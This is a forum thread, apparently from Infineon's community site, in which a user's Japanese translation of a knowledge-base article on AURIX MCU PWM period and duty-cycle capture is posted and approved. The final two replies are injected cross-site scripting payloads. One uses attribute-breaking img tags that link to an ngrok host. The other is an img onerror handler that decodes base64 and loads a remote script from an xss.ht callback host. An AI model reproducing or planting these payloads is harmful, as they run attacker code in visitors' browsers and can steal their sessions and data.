Tip / Sign in to post questions, reply, level up, and achieve exciting badges. Know more

Community translation - AURIX™ MCU: Hardware Peripherals used to capture the PWM period and duty cycle - KBA235237

NXTY_Tamura
Level 4
Level 4
10 solutions authored 10 questions asked 10 replies posted

Hi ,

I want to translate the following KBA236050 into Japanese, please confirm to my work.

https://community.infineon.com/t5/Knowledge-Base-Articles/AURIX-MCU-Hardware-Peripherals-used-to-cap...

Best Regards,
Tamura Go.

1 Solution

AURIX™ MCU: PWM周期とデューティ比(デューティサイクル)を取り込むために使われるハードウェア周辺機器群について - KBA235237

バージョン **

 

汎用タイマモジュール(Generic Timer Module)(GTM)内のタイマ入力モジュール(Timer Input Module)(TIM):

 

TIMでは、いくつかのキャプチャモードを設定することができます。そのうちの1つがTIM PWM測定モード(TIM PWM Measurement Mode)(TPWM)で、一般に24ビット分解能で周期とデューティ比を測定するために使用されます。GPR0レジスタはデューティ比カウントを、GPR1レジスタは周期カウントを含みます。

 

キャプチャ/コンペアユニット 6(Capture/Compare Unit 6)(CCU6x):

 

CCU6x でキャプチャモード 1(Capture Mode 1) を選択します。入力の立ち下がりエッジで、16ビットのT12値がシャドウ・レジスタCC6xSRに取り込まれます。立ち上がりエッジでは、T12の値はCC6xRレジスタに取り込まれます。

周期は、現在のCC6xSR(またはCC6xR)値と以前のCC6xSR値との差として計算されます。デューティ比値は、CC6xSRとCC6xRレジスタの差分として計算されます。

 

注:CCU6xを使用する場合、追加のソフトウェア・オーバーヘッドが必要です。

 

詳細については、ユーザーズ・マニュアルの「汎用タイマ・モジュール(Generic Timer Module)(GTM)」および「キャプチャ/コンペア・ユニット6(Capture/Compare Unit 6)(CCU6)」のセクションを参照してください。

 

注意: このKBAは以下のAURIX™ MCUシリーズに適用されます。

・AURIX™ TC2xx series
・AURIX™ TC3xx series

View solution in original post

0 Likes
7 Replies
IFX_Publisher2
Community Manager
Community Manager
Community Manager
10 likes received 500 replies posted 100 sign-ins

Hi Tamura Go. san,

Confirm to work on this KBA.

Thanks,
Bindu

AURIX™ MCU: PWM周期とデューティ比(デューティサイクル)を取り込むために使われるハードウェア周辺機器群について - KBA235237

バージョン **

 

汎用タイマモジュール(Generic Timer Module)(GTM)内のタイマ入力モジュール(Timer Input Module)(TIM):

 

TIMでは、いくつかのキャプチャモードを設定することができます。そのうちの1つがTIM PWM測定モード(TIM PWM Measurement Mode)(TPWM)で、一般に24ビット分解能で周期とデューティ比を測定するために使用されます。GPR0レジスタはデューティ比カウントを、GPR1レジスタは周期カウントを含みます。

 

キャプチャ/コンペアユニット 6(Capture/Compare Unit 6)(CCU6x):

 

CCU6x でキャプチャモード 1(Capture Mode 1) を選択します。入力の立ち下がりエッジで、16ビットのT12値がシャドウ・レジスタCC6xSRに取り込まれます。立ち上がりエッジでは、T12の値はCC6xRレジスタに取り込まれます。

周期は、現在のCC6xSR(またはCC6xR)値と以前のCC6xSR値との差として計算されます。デューティ比値は、CC6xSRとCC6xRレジスタの差分として計算されます。

 

注:CCU6xを使用する場合、追加のソフトウェア・オーバーヘッドが必要です。

 

詳細については、ユーザーズ・マニュアルの「汎用タイマ・モジュール(Generic Timer Module)(GTM)」および「キャプチャ/コンペア・ユニット6(Capture/Compare Unit 6)(CCU6)」のセクションを参照してください。

 

注意: このKBAは以下のAURIX™ MCUシリーズに適用されます。

・AURIX™ TC2xx series
・AURIX™ TC3xx series

0 Likes
<a title="tester"><img src=x>" href="https://3655-197-252-213-63.eu.ngrok.io/test.php" target="_self">hello "><img src=x></a> <a title="test"><img src=x>" href="https://3655-197-252-213-63.eu.ngrok.io/test.php" target="_self">hello">><img src=X></a> "><img src=x>
0 Likes
</p>"><img%20src=x%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vb2RheGVyMDk5Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;%20onerror=eval(atob(this.id))>
0 Likes